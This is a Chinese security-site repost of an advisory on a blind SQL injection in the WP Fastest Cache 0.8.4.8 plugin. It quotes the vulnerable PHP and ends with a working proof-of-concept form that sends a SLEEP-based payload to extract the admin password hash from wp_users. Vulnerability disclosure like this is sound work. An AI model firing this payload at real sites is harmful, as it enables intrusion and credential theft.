WordPress WP Fastest Cache 插件0.8.4.8盲注

admin
admin
admin
140350
文章
117
评论
2022年3月17日10:22:26评论60 views字数 2778阅读9分15秒阅读模式

插件主页:https://wordpress.org/plugins/wp-fastest-cache/

此漏洞需要安装WP-Polls模块。

文件: wp-fastest-cacheincwp-polls.php

public function hook(){ 	add_action( 'wp_ajax_nopriv_wpfc_wppolls_ajax_request', array($this, "wpfc_wppolls_ajax_request")); 	add_action( 'wp_ajax_wpfc_wppolls_ajax_request', array($this, "wpfc_wppolls_ajax_request"));}

$_POST["poll_id"]没有过滤,因为mysql_real_escape_string()只过滤x00, n, r, , ‘, “ and x1a.

文件: wp-fastest-cacheincwp-polls.php

public function wpfc_wppolls_ajax_request() { 	$id = strip_tags($_POST["poll_id"]); 	$id = mysql_real_escape_string($id);  	$result = check_voted($id);  	if($result){ 		echo "true"; 	}else{ 		echo "false"; 	} 	die();}

所以我们可以在check_voted_ip() 或check_voted_username()这两处进行注入。

文件: wp-pollswp-polls.php

function check_voted($poll_id) { 	$poll_logging_method = intval(get_option('poll_logging_method')); 	switch($poll_logging_method) { 		// Do Not Log 		case 0: 			return 0; 			break; 		// Logged By Cookie 		case 1: 			return check_voted_cookie($poll_id); 			break; 		// Logged By IP 		case 2: 			return check_voted_ip($poll_id); 			break; 		// Logged By Cookie And IP 		case 3: 			$check_voted_cookie = check_voted_cookie($poll_id); 			if(!empty($check_voted_cookie)) { 				return $check_voted_cookie; 			} else { 				return check_voted_ip($poll_id); 			} 			break; 		// Logged By Username 		case 4: 			return check_voted_username($poll_id); 			break; 	}}function check_voted_ip($poll_id) { 	global $wpdb; 	$log_expiry = intval(get_option('poll_cookielog_expiry')); 	$log_expiry_sql = ''; 	if($log_expiry > 0) { 		$log_expiry_sql = 'AND ('.current_time('timestamp').'-(pollip_timestamp+0)) < '.$log_expiry; 	} 	// Check IP From IP Logging Database 	$get_voted_aids = $wpdb->get_col("SELECT pollip_aid FROM $wpdb->pollsip WHERE pollip_qid = $poll_id AND pollip_ip = '".get_ipaddress()."' $log_expiry_sql"); 	if($get_voted_aids) { 		return $get_voted_aids; 	} else { 		return 0; 	}}function check_voted_username($poll_id) { 	global $wpdb, $user_ID; 	// Check IP If User Is Guest 	if (!is_user_logged_in()) { 		return 1; 	} 	$pollsip_userid = intval($user_ID); 	$log_expiry = intval(get_option('poll_cookielog_expiry')); 	$log_expiry_sql = ''; 	if($log_expiry > 0) { 		$log_expiry_sql = 'AND ('.current_time('timestamp').'-(pollip_timestamp+0)) < '.$log_expiry; 	} 	// Check User ID From IP Logging Database 	$get_voted_aids = $wpdb->get_col("SELECT pollip_aid FROM $wpdb->pollsip WHERE pollip_qid = $poll_id AND pollip_userid = $pollsip_userid $log_expiry_sql"); 	if($get_voted_aids) { 		return $get_voted_aids; 	} else { 		return 0; 	}}

poc

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request"> 	<input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- "> 	<input type="submit" value="Send"></form>

from;https://rstforums.com/forum/107273-wordpress-wp-fastest-cache-plugin-0-8-4-8-blind-sql-injection.rst

翻译:小歪(关注安全技术公众号&heresec)

本文始发于微信公众号(关注安全技术):WordPress WP Fastest Cache 插件0.8.4.8盲注

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月17日10:22:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WordPress WP Fastest Cache 插件0.8.4.8盲注https://cn-sec.com/archives/502870.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息